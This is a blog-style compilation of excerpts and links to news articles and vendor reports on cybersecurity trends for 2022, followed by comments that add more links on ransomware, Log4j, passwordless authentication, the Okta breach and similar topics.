Nothing is more difficult than making predictions. Instead of trowing out wild ideas what might be coming, I have collected here some trends other people have predicted or reported.
Why the Future Needs Passwordless Authentication
https://securityintelligence.com/future-needs-passwordless-authentication/
As of September, Microsoft users no longer have to rely on passwords when logging in to their accounts. Passwords were suitable for authentication when users had fewer accounts, but things have changed.
Nowadays, everyone’s digital footprint is larger, making passwords more of a burden than a security necessity.
Cyber Warfare: What To Expect in 2022
https://securityintelligence.com/articles/cyber-warfare-what-to-expect-2022/
Cyberwarfare is not a future threatit’s a clear and present danger.
While the concept of cyber terrorism might sound like something from a fictional movie, our interconnected world is riddled with security flaws that make it an unfortunate reality. Read on as we cover seven cyber warfare and cybersecurity threats to watch out for in 2022.
Prediction Season: What’s in Store for Cybersecurity in 2022?
https://www.securityweek.com/prediction-season-whats-store-cybersecurity-2022
The past year has been quite challenging and tiring for many IT and security professionals, as threat actors capitalized on the rapidly changing environment created by accelerated digitalization and cloud transformation in response to the COVID-19 pandemic. And while we all hope that the next year is better when it comes to the onslaught of daily phishing, ransomware, and credential stuffing attacks; cyber criminals will likely learn from this year’s successful tactics, retool, and pivot them into next year’s campaigns to wreak even more havoc in all lives.
Consider the following threats that are on the horizon in 2022 and start preparing for them now:
Compromised Identities Continue to Fuel the Cyberattack Engine
Ransomware Attacks Evolve to Multifaceted Extortion Schemes
Pay Attention to the Supply Chain Threats
The Work from Anywhere Era Creates New Threats
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
We are proceeding in an era of “Malthusian” advances in science and technology, enabled by faster computing and ever-expanding data analytics. Those emerging technologies are significantly impacting cybersecurity. They include artificial intelligence (AI), machine learning, high-performance computing, cloud, edge computing, 5G, and eventually quantum technologies.
Computing systems that employ AI and ML are becoming more pervasive and critical to cyber operations and have become a major focus of cybersecurity research development and investments. Advanced 5G and wireless networks will benefit higher traffic capacities, lower latency, increased reliability, and enable processing and analytics in real-time. Edge computing strives to bring real-time computation, data storage, and operations closer to the device, rather than relying on a central location, avoiding latency issues. Technologies that improve capabilities for discovering, categorizing, monitoring, synthesizing, and automating the analysis of data are advantages in mitigating cybersecurity threats. Specifically, such tech can be used to bolster botnet detection and mitigation technology, data visualization tools, active malware protection, rootkit detection and mitigation technology, and incident response analytics.
Emerging tech can be a two-way street for good and bad. Artificial intelligence and machine learning can be used by hackers to automate target selection and more. Threat actors, especially state-sponsored and criminal enterprises, are becoming more sophisticated by searching for vulnerabilities and infiltrating malware by adapting (and automating), enabling machine learning, deep learning, artificial intelligence, and other analytic tools.
Also, the emergence of the Internet of Things presents special security challenges. There are an estimated 44 billion IoT endpoints today and trillions of sensors connected to those endpoints. Hackers have many attack options and entries for inserting malware into such a large and unregulated attack surface.
Google Finds 35,863 Java Packages Using Defective Log4j
https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j
The computer security industry is bracing for travel on long, bumpy roads littered with Log4j security problems as experts warn that software dependency patching hiccups will slow global mitigation efforts.
The sheer scale and impact of the crisis became a bit clearer this week with Google’s open-source team reporting that a whopping 35,863 Java packages in Maven Central are still using defective versions of Log4j library.
The vulnerability, flagged as CVE-2021-44228, was first discovered and reported by the Alibaba cloud security team on November 24 this year. Less than two weeks later, exploitation was spotted in the wild, prompting the release of multiple high-priority patches and an industry-wide scramble to apply practical mitigations.
Many actors have exploited the critical Apache Log4j vulnerability named Log4Shell to infect vulnerable devices. Apache has released several Log4j versions to fix the original Log4j vulnerability (CVE-2021-44228) and newer findings on the same software (CVE-2021-44832, CVE-2021-45046, CVE-2021-45105, CVE-2021-42550).
Threat Intelligence on Log4j CVE: Key Findings and Their Implications
https://www.akamai.com/blog/security/threat-intelligence-on-log4j-cve-key-findings-and-their-implications
Expect this vulnerability to have a long attack tail. We anticipate that due to how widely used this software is and the large number of exploit variations, we will continue to see exploit attempts for months to come and expect many breaches will get uncovered going forward.
Attackers used opportunistic injections and became more targeted. Consequences of the reconnaissance may not be fully understood for months. While the attacks can be mitigated by patching and other methods, it’s unclear how many breaches have happened already. It will take time for the breaches to come to light and for us to understand their magnitude.
Ransomware in 2022: We’re all screwed
https://www.zdnet.com/article/ransomware-in-2022-were-all-screwed/
Over the past few years, we’ve seen ransomware operators evolve from disorganized splinter groups and individuals to highly sophisticated operations, with separate teams collaborating to target everything from SMBs to software supply chains. Ransomware infection is no longer an end goal of a cyberattack. We are experiencing the “golden era of ransomware,” now in part due to multiple monetization options.
Burnout: The next great security threat at work
https://blog.1password.com/state-of-access-report-burnout-breach/
Many companies feel like they’ve successfully pivoted to remote and hybrid work. Team members have learned the tools and processes required to be successful outside the office, and IT departments have adjusted their security rules and policies accordingly. But now, nearly two years into the pandemic, another cybersecurity threat has
emerged: employee burnout.
In 2022, security will be Linux and open-source developers job number one
https://www.zdnet.com/article/in-2022-security-will-be-linux-and-open-source-developers-job-number-one/
Linux is everywhere. It’s what all the clouds, even Microsoft Azure, run. It’s what makes all 500 of the Top 500 supercomputers work. Heck, even desktop Linux is growing if you can believe Pornhub, which claims Linux users grew by 28%, while Windows users declined by 3%. Its real trouble isn’t so much with open-source itself. There’s nothing magical about open-source methodology and security. Security mistakes can still enter the code. Linus’s law is that given enough eyeballs, all bugs are shallow. But, if not enough developers are looking, security vulnerabilities will still go unnoticed. As what I’m now calling Schneier’s law, “Security is a process, not a product, ” points out constant vigilance is needed to secure all software.
The future of OT security in an IT-OT converged world
https://www.theregister.com/2021/11/09/securing_ics_in_the_cloud/
Securing ICS in the cloud requires ‘fundamentally different’ approach
If you thought the industrial internet of things (IIoT) was the cutting edge of industrial control systems, think again. Companies have been busy allowing external access to sensors and controllers in factories and utilities for a while now, but forward-thinking firms are now exploring a new development; operating their industrial control systems (ICS) entirely from the cloud. That raises a critical question: who’s going to protect it all?
Dave Masson, Director of Enterprise Security at Darktrace, calls this new trend ‘ICSaaS’. “ICS for the cloud is starting to happen now. That represents a whole new world for industrial technology and security.”
This trend has been possible for the last decade or so, he explains, but the uptake has been slow. Now, Masson is hearing from clients who are actioning it.
Operational technology admins may be nervous about allowing cloud-based control of their infrastructures, but they’re attracted by the potential benefits. If operators are accessing ICS remotely anyway, then it makes it easier to consider cloud-based interfaces. These make the management infrastructure cheaper and easier to operate.
In this scenario, the hardware components that make up ICS stay where they are. We’re not talking about virtualizing programmable logic controllers here. It’s the data governing their operation that moves to the cloud. That means the applications, databases, and other services that operators rely on to keep those components running smoothly.
Security is just as important in these new cloud-enabled environments as it was in the old legacy walled gardens, but the challenges facing defenders are different. The cloud is eroding the gap between IT and OT. OT is now part of what looks increasingly like a common IT network.
“Now, anybody can access this network from anywhere, so you’ve got to make sure you have good controls around who’s got permission”
“This raises questions about data security, compliance, and regulation.”
OT admins, used to maintaining an iron grip on their infrastructure, now risk a loss of visibility and control. There are organizational worries to consider beyond the technological ones. Converging IT/OT infrastructures is only part of the story. You must also decide who is managing security for the expanded network. Is it the IT security team, or the OT team, or both?
Zero trust architecture is a common talking point today when discussing cloud-based security, and that will be important. ICSaaS is only one part of a broader shift towards OT/IT convergence. The advent of 5G, along with the development of edge computing, will accelerate the trend still further.
Sophos 2022 Threat Report: Malware, Mobile, Machine learning and more!
https://nakedsecurity.sophos.com/2021/11/09/2022-threat-report/
we’ve covered five main topics: 1 Malware, 2 Mobile, 3 Machine Learning and AI, 4 Ransomware (because we simply couldn’t not give it a section of its own), and 5 Where next?. PDF:
https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2022-threat-report.pdf
“AI and ML will be an enabler for cybersecurity for the foreseeable future”
https://cisomag.eccouncil.org/ai-and-ml-will-be-an-enabler-for-cybersecurity-for-the-foreseeable-future/
What are some of the emerging technologies in security? Would these generate opportunities and create challenges?
Critical Infrastructure (CI) and supply chain will be targeted even more in 2022 (state-sponsored, cybercriminal gangs) with ransomware and malware attacks.
• Investment and risk strategies will expand in conducting vulnerability assessments and filling operational gaps with cybersecurity tools. Tools include Data Loss Prevention (DLP), encryption, identity and access management solutions, log management, and SIEM platforms.
• Despite efforts to attract workers to security and tech jobs, the qualified cybersecurity worker shortage will continue to pose major operational challenges. Both the public and private sectors are currently facing challenges from a dearth of cybersecurity talent. A report out from the firm Cybersecurity Ventures estimates there are 3.5 million unfilled cybersecurity jobs in 2021. 2022 is not showing any signs of improvement in hiring.
• The Internet of Things (IoT) will pose a growing cybersecurity risk. IoT’s exponential connectivity is an ever-expanding mesh of networks and devices.
There are some specific areas where AI technology will contribute to making cybersecurity smarter include:
• AI can provide a faster means to detect and identify cyberthreats. Cybersecurity companies will be using software and a platform powered by AI that monitors real-time activities on the network by scanning data and files to recognize unauthorized communication attempts, unauthorized connections, abnormal/malicious credential use, brute force login attempts, unusual data movement, and data exfiltration. This allows businesses to draw statistical inferences and protect against anomalies before they are reported and patched.
• AI will impact Incident Diagnosis and Response capabilities.
While descriptive analytics provided by network surveillance and threat detection tools can answer the question “what happened,” incident diagnosis analytics address the question of “why and how it happened.” To answer those questions, new software applications and platforms powered by AI can examine past data sets to find root causes of the incident by looking back at change and anomaly indicators in the network activities
• AI will also enable better cyberthreat intelligence reports by analysts. Next year analysts will be able to use AI tools to generate automated cyberthreat intelligence reports (CTI). Cyberthreat intelligence reports provide the indicators and early warning necessary to better monitor unusual activities on a given network and detect more rapidly cyber threats.
AI and ML will be an enabler for cybersecurity for the foreseeable future. AI-powered tools and automation enablement will play an increased and integral role in keeping us cyber-safe in 2022 and beyond.
Kännyköiden tietoturva menee uusiksi
https://etn.fi/index.php/13-news/12788-kaennykoeiden-tietoturva-menee-uusiksi
In smartphones, security has been in place for more than a decade, with trusted processing performed in the TEE (Trusted Execution Environment) section of device memory. The current standard solution for smartphone security is typically created with Arm’s TrustZone technology. The phone’s own security comes from TEE. A secure boot usually includes a TEE. TEE has been an elegant solution for smartphones, although it is becoming old-fashioned (Arm TrustZone was developed 15 years ago).
The memory required by the TEE has not been available in the small controller chips used for embedded applications. Manufacturers have promoted Safe Boot and Memory Encryption or Flash Encryption, but they have been pretty weak solutions. Recently, Arm’s TrustZone M has introduced a new security model for controllers.
In recent years, this picture has begun to diversify. A revolution is underway now. Google has launched a keystone technology that allows an application to generate a system-maintained key and authenticate services (still uses TEE).
In the future, for example, encryption keys will be stored in an isolated memory area, an enclave, says Jan-Erik Ekberg, head of Huawei’s HSSL laboratory (Helsinki System Security Lab). Five years ago, Intel introduced SGX technology for PC servers, which simply means security extension commands added to the CPU chip. In this solution, TEE type protections are provided by a secure enclave. The use of this type of security enclave needs less code than traditional TEE structure. An enclave is a temporary structure in the memory of a device. It is created only for security processes and exits when it has completed its task. The difference is significant in the TEE structure, where another kernel runs all the time alongside the operating system. When there is no other parallel kernel, there is one component less to attack.
In Intel’s SGX, enclaves were implemented through caching, which limited their use. Intel has sought to overcome this limitation with newer TDX (Trust Domain Extensions) technology. AMD aims to do the same with its own SEV (Secure Encrypted Virtualization) technology.
Enclave-style solution structure will also come in the smart phones. The new Armv9-A architecture last year offers a realm mode that is very close to the technologies offered on the server side (Intel SGX). With the coming enclaves, an infinite number of secured environments will be available in principle.
In the mobile ecosystem, TEE is so deeply rooted that the transition will probably take five years. During the transition period TEE and more dynamic solutions will be on the market in parallel.
Kyberhyökkäykset uhkaavat jo tavarantoimituksiakin
https://www.uusiteknologia.fi/2021/11/08/kyberhyokkaykset-uhkaavat-jo-tavarantoimituksiakin/
Cyber attacks will cause chaos in product supply chains in the future, estimates Japanese security firm Trend Micro in its latest report. They can also cause physical harm to people, so it’s not just about problems with production or distribution.
According to Trend Micro, network connectivity by 2030 will affect our everyday lives even more, both physically and mentally. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Artificial intelligence tools democratize cybercrime from technically savvy individuals and criminal organizations to all. The new “Everything as a Service” service model also makes cloud service providers very attractive targets for cyber attackers.
Massive IoT (MIoT) environments in industrial facilities, logistics centers, transportation systems, healthcare, education, commerce, and homes are attractive targets for saboteurs and blackmailers. The new 5G and subsequent 6G networks are also making attacks more sophisticated and targeted.
In the future, user manipulation and fake news will become increasingly important and difficult to ignore when fed to smart glasses. Reality can be badly distorted.
https://resources.trendmicro.com/rs/945-CXD-062/images/WP01_Project%202030_White%20Paper_210505US_Web.pdf
Jarno Limnéll varoittaa “kyberpandemiasta” internetin häiriö voi panna maailman taas sekaisin
https://www.tivi.fi/uutiset/tv/211df5c9-7909-47b7-842b-719f6a496206
Cyber harassment and sports doping have a lot in common. Tracing and testing methods are evolving, but so are scams. And scammers always seem to be one step ahead. Sometimes they are only revealed years later. “The world is moving in the direction that technology is evolving faster and faster, and rather increasing the possibility of various disruptions and creating new types of vulnerabilities. There is no seamless security,” Limnagl says. So even with technology, the world will not be completed. In addition, crises always come as a surprise: New York on September 11, the Bosnian war, Hitler’s rise to power, the shots in Sarajevo. “In light of history, we’re always surprised. And if you think about it, technology only adds to the complexity and surprise of crises.”
Kyberhyökkäykset kiihtyvät, mutta yritykset voivat vastata niihin
https://etn.fi/index.php/new-products/13-news/12920-kyberhyoekkaeykset-kiihtyvaet-mutta-yritykset-voivat-vastata-niihin
Cyber attacks are accelerating, but companies can respond to them A new study by security firm Trend Micro predicts that the number of cyber attacks will increase, with a particular focus on IoT devices. At the same time in 2022 global organizations will be more vigilant and better prepared to face new cyber threats. Research, foresight, and automation are critical to risk management and employee protection. The shift of workers to telecommuting has opened up new avenues for attackers, so the attack area of companies and organizations has grown exponentially. Fortunately, hybrid work is becoming more established and more predictable, allowing security decision-makers to plan and refine their security strategies. Those are:
• Enhanced server security and application management policies to combat blackmail
• A risk-based update plan and an effort to detect security vulnerabilities in advance
• Improved basic protection for SMEs using cloud services
• Active network monitoring, especially in IoT environments
• Zero Trust security model to secure international supply chains
• Cloud security focused on the risks assessed by the DevOps team and industry best practices
• Advanced Detection and Response (XDR) model to detect attacks on large networks
Trend Micron raportti: tulevaisuudessa kaikki on vaarassa
https://etn.fi/index.php/13-news/12785-trend-micro-raportti-tulevaisuudessa-kaikki-on-vaarassa
Security company Trend Micro has released its 2030 future report. Videos also tell us what the world could look like at the beginning of the next decade. From the perspective of cyber threats and cybersecurity, the future looks bleak. By 2030, connectivity, or continuous online presence, will affect our daily lives on both a physical and mental level. At the same time, cyber threats are constantly evolving and abusing technological innovation in ever new ways.
Trend Micro hopes that this review will spark debate both within the security industry and in society at large. We can only prepare for the cyber challenges of the next decade by comprehensively anticipating all possible situations and advising how governments, the business world and individuals can prepare for them.
Project 2030
https://2030.trendmicro.com/?utm_campaign=ADC2021_Corporate_2030_Predictions&utm_medium=Press-Release&utm_source=Press-Release_Glimpse-into-future_PR&utm_content=Watch-video
Welcome to your new reality, more connected than ever to all the riches modern life has to offer, yet where truth has never been more insubstantial.
3,062 Comments
Tomi Engdahl says:
CISOs face ‘perfect storm’ of ransomware and state-supported cybercrime https://www.theregister.com/2022/03/18/ciso_security_storm/
With not just ransomware gangs raiding network after network, but nation states consciously turning a blind eye to it, today’s chief information security officers are caught in a “perfect storm, ” says Cybereason CSO Sam Curry. “You get the umbrella of sovereignty, and you get the free license to be a privateer in essence, ” Curry said.
“It’s not just an economic threat. It’s not just a geopolitical threat. It’s a perfect storm.”. While cyber resiliency plays a key role in recovering from an attack, securing corporate IP and other data inside the organization isn’t always enough to keep a business up and running. “It can take a simple third-party logistic organization to shut down your entire organization at the same time.”
Tomi Engdahl says:
The Golden Hour of Incident Response
https://thehackernews.com/2022/03/the-golden-hour-of-incident-response.html
As a CSIRT consultant, I cannot overemphasize the importance of effectively managing the first hour in a critical incident. Finding out what to do is often a daunting task in a critical incident. In addition, the feeling of uneasiness often prevents an incident response analyst from making effective decisions. However, keeping a cool head and actions planned out is crucial in successfully handling a security incident. This blog will elaborate on some key points to help readers facilitate better incident response procedures.
Tomi Engdahl says:
A big bet to kill the password for good
https://arstechnica.com/information-technology/2022/03/a-big-bet-to-kill-the-password-for-good/
After years of tantalizing hints that a passwordless future is just around the corner, you’re probably still not feeling any closer to that digital unshackling. Ten years into working on the issue, though, the FIDO Alliance, an industry association that specifically works on secure authentication, thinks it has finally identified the missing piece of the puzzle. On Thursday, the organization published a white paper that lays out FIDO’s vision for solving the usability issues that have dogged passwordless features and, seemingly, kept them from achieving broad adoption. The paper is conceptual, not technical, but after years of investment to integrate what are known as the FIDO2 and WebAuthn passwordless standards into Windows, Android, iOS, and more, everything is now riding on the success of this next step. See also:
https://media.fidoalliance.org/wp-content/uploads/2022/03/How-FIDO-Addresses-a-Full-Range-of-Use-Cases.pdf
Tomi Engdahl says:
Nolot hakutulokset saa piiloon entistä nopeammin toimi näin
https://www.tivi.fi/uutiset/tv/c1e6095f-8641-4dd1-a423-2c2b9ca8dd29
Ominaisuus on ollut saatavilla iOS-sovelluksella jo viime kesästä lähtien, mutta Google päätti odottaa sen tuomista Android-käyttäjille.
Jotkut käyttäjät kertovat, että ominaisuus on jo toiminnassa Android-sovelluksessa. Uuden ominaisuuden käyttäminen tapahtuu klikkaamalla omaa profiilia Google-sovelluksessa. Ominaisuuden löytää valikosta selaushistorian alapuolelta, ja nappia painamalla sovellus poistaa viimeiset 15 minuuttia käyttäjän selaushistoriasta. Ominaisuus on nyt saatavilla Google-sovelluksen iOS- ja Android-versioissa. Yhtiö ei ole kuitenkaan vielä maininnut saapuuko ominaisuus sovelluksen tietokoneversiolle.
Tomi Engdahl says:
IOCs vs. IOAs How to Effectively Leverage Indicators https://securityintelligence.com/posts/iocs-ioas-how-to-leverage-security-indicators/
Cybersecurity teams are consistently tasked to identify cybersecurity attacks, adversarial behavior, advanced persistent threats and the dreaded zero-day vulnerability. Through this endeavor, there is a common struggle for cybersecurity practitioners and operational teams to appropriately leverage indicators of compromise (IOCs) and indicators of attack (IOAs) for an effective monitoring, detection and response strategy. Inexperienced security teams and leaders tend to establish a catch-all approach, where quantity outweighs quality to stop the next perceived intrusion attempt. Unfortunately, this strategy rarely provides an operational edge and greatly hinders operational readiness. Obtaining a better understanding of indicators, their intent, and how to better leverage them within your environment is essential to driving good security practices and providing enablement, not hindrance, to your analysts.
Tomi Engdahl says:
New Linux kernel has improved random-number generation • The Register
https://www.theregister.com/2022/03/21/new_linux_kernel_has_improved/
As outlined by the author of the changes, Jason A Donenfeld, the newly released kernel 5.17 contains the first stage of the big rewrite, but more will follow in 5.18. Among other changes, the /dev/random and /dev/urandom devices now do exactly the same. This brings the Linux kernel in line with FreeBSD and macOS.
There have been previous big improvements in the kernel RNG. In kernel 4.8, /dev/urandom became cryptographically secure: a new algorithm, ChaCha20, made it resistant to analysis and prediction of forthcoming values. Kernel 5.6 made random and urandom devices similar. In 2020, /dev/random was tweaked to only block while waiting to be initialized. And now, both devices behave the same so you can use either without worry of processes stalling on an entropy drought nor worries about predictable randomness.
The changes in 5.17 eliminate use of the SHA-1 algorithm, which was cracked in 2005 and was being gradually replaced for years. Now it’s gone, replaced by BLAKE2, a descendant of ChaCha20.
Tomi Engdahl says:
Venäjällä ehdotetaan it-osaajien värväämistä kyberjoukkoihin “miettisivät 10 kertaa ennen kuin jättävät kotimaansa”
https://www.tivi.fi/uutiset/tv/de733dac-bb16-496f-af55-6824e3c7004a
Venäjän duuman informaatiopolitiikan komitean kokouksessa on hiljattain keskusteltu kyberjoukkojen mahdollisesta perustamisesta.
Ehdotuksen on tehnyt Venäjän kauppa- ja teollisuusministeriön varajohtaja Vasili Shpak. Hän perustelee talouslehti Kommersantin mukaan kyberjoukkojen perustamista sillä, että tämä saisi venäläiset it-alan osaajat kehittämään heidän isänmaallisia ominaisuuksiaan.
Venäläiset asiantuntijat “miettisivät kymmenen kertaa ennen kuin jättävät kotimaansa rajat tavoitellakseen suuria ansioita ulkomaisissa yrityksissä.”
Tomi Engdahl says:
Mitigate Top 5 Common Cybersecurity Vulnerabilities https://www.trendmicro.com/en_us/devops/22/c/mitigate-top-5-common-cybersecurity-vulnerabilities.html
Vulnerabilities in software and infrastructure are a fact of life for developers and SREs, but that doesn’t mean you must accept them. Given the exponential growth of vulnerabilities, DevOps teams must be aware of and learn how to mitigate these risks to ensure healthy systems and applications. This article will focus on five common vulnerabilities in no particular order of severity. We’ll examine some in-depth information on each vulnerability’s root cause and how it can impact affected services. Then, we’ll explore how to spot these vulnerabilities and outline basic strategies for remediation.
Tomi Engdahl says:
Vaasan yliopiston tutkijat ehdottavat energia-alalle yhteisiä kyberturvallisuusharjoituksia “Kyberturvallisuudessa ihminen on heikoin lenkki”
https://yle.fi/uutiset/3-12370250
Joskus organisaatiossa kyberriskejä torjutaan teknisesti erinomaisilla ratkaisuilla, mutta esimerkiksi ihmisten toiminnasta aiheutuvat käytännön riskit jäävät huomiotta. Vaasan yliopiston kysely toteutettiin kesällä 2021. Professori Tero Vartiaisen mukaan kyselyyn ei palautunut vastauksia niin paljon kuin ehkä olisi toivottu, mutta saatujen vastausten perusteella voi sanoa, että energia-alalla tunnistetaan kyberturvallisuuteen liittyvät riskit. Kyselyn perusteella Vartiainen tutkimusryhmineen on todennut, että energia-alalla kaivataan yhteistyötä ja esimerkiksi julkisen ja yksityisen sektorin yhteisiä kyberturvallisuusharjoituksia.
Tomi Engdahl says:
Sandworm: A tale of disruption told anew
https://www.welivesecurity.com/2022/03/21/sandworm-tale-disruption-told-anew/
For cybersecurity pundits, it has become a doctrine that cyberdisruption, whether perpetrated directly or via proxy groups, can be expected to accompany military, political, and economic action as a way of softening up targets or of strategically applying pressure via subterfuge. Thus, in a time of war in Ukraine, the spotlight has also naturally turned to cyberwarfare, both past and present. Since at least 2014, companies in Ukraine or with network access to the region have suffered the likes of malware such as BlackEnergy, TeleBots, GreyEnergy, Industroyer, NotPetya, Exaramel, and, in 2022 alone, WhisperGate, HermeticWiper, IsaacWiper, and CaddyWiper. In all cases, except the last four, the cybersecurity community discovered enough code similarities, shared command and control infrastructure, malware execution chains and other hints to attribute all the malware samples to one overarching group Sandworm.
Tomi Engdahl says:
Exploring a New Class of Kernel Exploit Primitive https://msrc-blog.microsoft.com/2022/03/22/exploring-a-new-class-of-kernel-exploit-primitive/
The security landscape is dynamic, changing often and as a result, attack surfaces evolve. MSRC receives a wide variety of cases spanning different products, bug types and exploit primitives. One particularly interesting primitive we see is an arbitrary kernel pointer read.
These often happen when kernel mode code does not validate that pointers read from attacker-controlled input actually point to the user-mode portion of the Virtual Address Space (VAS). However, it isn’t always clear how to assess cases where the primitive an attacker has is to cause an arbitrary kernel pointer read but cannot leak the data. Traditionally, these would have an impact of Denial of Service
(DoS) or in some cases a second-order Kernel Memory Information Disclosure (where side channels or indirect probing are possible) but we wonder if such a limited primitive could actually be exploited for code execution / privilege escalation?. The idea we wanted to explore when pondering the above question was; can we exploit reads to Memory Mapped I/O (MMIO) ranges of peripheral device drivers?. Reads to MMIO ranges are used for two-way communication between the device driver and the IO device and it wouldn’t be a stretch to imagine that they would be sensitive to the order, timing and even the size of memory reads issued to their respective MMIO space.
Tomi Engdahl says:
Vendor Security Assessment
https://www.ncsc.gov.uk/report/vendor-security-assessment
This document provides guidance on how operators should assess the security of vendor’s security processes and vendor equipment and is referenced in the Telecom Security Act Code of Practice. The purpose of the guidance is to allow operators to objectively assess the cyber risk due to use of the vendor’s equipment. This is performed by gathering objective, repeatable evidence on the security of the vendor’s processes and network equipment. Report:
https://www.ncsc.gov.uk/files/NCSC-Vendor-Security-Assessment.pdf
Tomi Engdahl says:
IoT Security and the Internet of Forgotten Things https://securityintelligence.com/articles/iot-security-internet-forgotten-thing/
In 2017, the number of connected devices surpassed the world’s human population. That’s a lot of things. However, many of them were not built with security in mind. It didn’t take long for attackers to take advantage of Internet of Things (IoT) vulnerabilities. One case in
2016 saw threat actors take down Dyn, a company that managed web traffic for Twitter, Spotify, Netflix, Reddit, Etsy, Github and other major brands. Threat actors inserted Mirai malware to commandeer at least 100, 000 devices (webcams, DVRs, etc.) as zombies to launch a massive attack against Dyn. Fast forward to now. How many IoT devices are out there waiting for a breach? Today, about 12.3 billion devices connect to the internet worldwide. What about the devices you might have forgotten about? Can they still connect to your network? What’s the risk? Even more importantly, what can you do about it? Let’s find out.
Tomi Engdahl says:
How legacy IPv6 addresses can spoil your network privacy https://www.theregister.com/2022/03/22/legacy_ipv6_addressing_standard_enables/
A single device within an IPv6 home network can reduce the privacy of every computer, handheld, and other gadget on that network, enabling all devices to be tracked around the internet, even those with IPv6 privacy protections. In a research paper titled “One Bad Apple Can Spoil Your IPv6 Privacy, ” Said Jawad Saidi, of MPI-INF in Germany; Oliver Gasser, also of the MPI-INF; and Georgios Smaragdakis, of TU Delft in the Netherlands describe how the use of legacy IPv6 addressing standard EUI-64, aka Extended Unique Identifier, by just one device potentially degrades privacy to every device on that network. Their paper is scheduled to be published next month in ACM SIGCOMM Computer Communication Review, Volume 52, Issue 2. Paper:
https://arxiv.org/abs/2203.08946
Tomi Engdahl says:
Wartime Cyber Insurance Wobbled By New Fine Print. Do Boards Know?
https://www.forbes.com/sites/noahbarsky/2022/03/22/wartime-cyber-insurance-wobbled-by-new-fine-print/
The Russia-Ukraine war has spiked cybersecurity concerns. As companies internally question digital defense adequacy, insurance provides a popular mitigation fallback against breach-related losses. Yet, surprising to many policyholders, a recent court ruling may soon undercut wartime cyber claims. In January 2022, Merck won a $1.4 billion judgment against Ace Insurance related to a 2017 NotPetya malware attack which damaged 40, 000 company computers. Ace denied Merck’s claim on the basis that ransomware was excluded under rarely-invoked “act of war” exemptions. The court ruled against Ace, prompting prominent insurers to swiftly revise policy coverage terms related to cyber losses. Lloyd’s Market Association’s (LMA) Cyber Business Panel recently published four cyberinsurance policy exclusion clauses, which significantly broaden insurers’ protection against “cyber operations” launched by governments or surrogates. These evolving terms parallel emerging cybersecurity insurance legal precedents.
Tomi Engdahl says:
Okta Hack Exposes A Huge Hole In Tech Giant Security https://www.forbes.com/sites/thomasbrewster/2022/03/23/okta-hack-exposes-a-huge-hole-in-tech-giant-security/
Under Costa Rica’s sunny skies, in a pastel-colored office space northwest of the capital San José, employees are beavering away in their cubicles, answering calls and providing tech support for customers. They work for a little-known outsourcing firm called Sykes.
Most people have never heard of the company, even though it’s now part of Sitel Group. According to LinkedIn profiles, its staff have done contract work for companies that are instantly recognizable, such as Amazon and Cisco, to name two. Working as a Sykes customer-support employee requires access to data of the contracting company’s big-name clients. That access, it turns out, is very attractive to hackers.
Sykes confirmed to Forbes that “parts” of its network were hacked in January, claiming it didn’t believe any serious breach had occurred and there was no longer a risk for its corporate customers (or for the customers of its customers). Okta later said that the breach lasted five days and allowed the hackers to reset passwords and those one-time codes.
Tomi Engdahl says:
Verkkoon piirretty viiva
https://yle.fi/uutiset/3-12370108
Kybersota on julistettu alkaneeksi useita kertoja viime vuosikymmenien aikana. Jälkikäteen julistukset ovat paljastuneet ennenaikaisiksi.
Onko nyt toisin?. Viimeisen kahdeksan vuoden aikana venäläishakkerit ovat toistuvasti murtautuneet Ukrainan viranomaisten, pankkien, medioiden ja yritysten järjestelmiin. Palvelunestohyökkäykset ovat arkipäivää ja useita vaarallisia haittaohjelmia on lähtenyt leviämään Ukrainasta maailmalle. Kybersota on hankalasti määriteltävä termi.
Yleisesti sillä tarkoitetaan informaatioteknologian hyväksikäyttämistä sotilaallisen toiminnan rinnalla. Toisaalta usein kybersodankäynnin katsotaan pitävän sisällään vihollisten järjestelmiin kohdistuvien kyberhyökkäysten lisäksi verkkotiedustelun ja -vakoilun. Kybersodan rajat ovat paljon hämärämmät kuin perinteisen sodan, jonka rajat eivät nekään ole täysin selkeät. Jos valtioiden harjoittama verkkotiedustelu on kybersotaa, me olemme käyneet globaalia kybersotaa vuosikymmenten ajan. Jos taas kehittyneiden verkkohyökkäysten pitää olla yhteydessä fyysisiin sotilastoimiin, maailman ensimmäinen kybersota saattaa olla vasta edessä.
Tomi Engdahl says:
Bad Actors Trying to Capitalize on Current Events via Shameless Email Scams https://www.fortinet.com/blog/threat-research/bad-actors-capitalize-current-events-email-scams
Malicious email and phishing scams are usually topical and follow a pattern of current events. They are usually crafted around calendar and/or trending issues as attackers realize that victims are interested in all things relevant to the moment. Threat actors are aware that not all recipients will bite, but some will, hence the origination of the term “phishing.”. Threat actors often put in the least amount of work possible for a maximum return, sending out phishing emails to thousands of targets. Even if less than one percent of victims respond, the return on investment is still significant due to the gain of PII and/or establishing a foothold within an organization using stolen credentials, malware, or other means. This blog highlights some examples we’ve encountered that may help users better spot suspicious emails. Recent examples observed by FortiGuard Labs include emails related to tax season and the Ukrainian conflict, which reflect the timeliness of current and newsworthy events at the time of writing.
Tomi Engdahl says:
This is how much the average Conti hacking group member earns a month https://www.zdnet.com/article/this-is-how-much-the-average-conti-hacking-group-member-earns-a-month/
The average Conti ransomware group member earns a salary of $1, 800 per month, a figure you might consider low considering the success of the criminal gang. On Wednesday, Secureworks published a set of findings based on the group’s internal chat logs, leaked earlier this month and poured over by cybersecurity researchers ever since. Check Point researchers have previously scoured the Conti chat logs and exposed a rather “mundane” operation, the type you’d expect a typical software development business to run. This included a business infrastructure offering office, hybrid, or remote work options, performance reviews, bonuses, and a hiring process for coders, testers, system administrators, and HR.. See also:
https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships
Tomi Engdahl says:
Hackers steal from hackers by pushing fake malware on forums https://www.bleepingcomputer.com/news/security/hackers-steal-from-hackers-by-pushing-fake-malware-on-forums/
Security analysts from two companies have spotted a new case of hackers targeting hackers via clipboard stealers disguised as cracked RATs and malware building tools. Clipboard stealers are quite common, typically used to monitor the clipboard content of a victim to identify cryptocurrency wallet addresses and replace them with one belonging to the malware operator. This allows attackers to hijack financial transactions on the fly, and transfer the money to their accounts. These stealers focus on the more popular cryptocurrencies, like Bitcoin, Ethereum, and Monero.
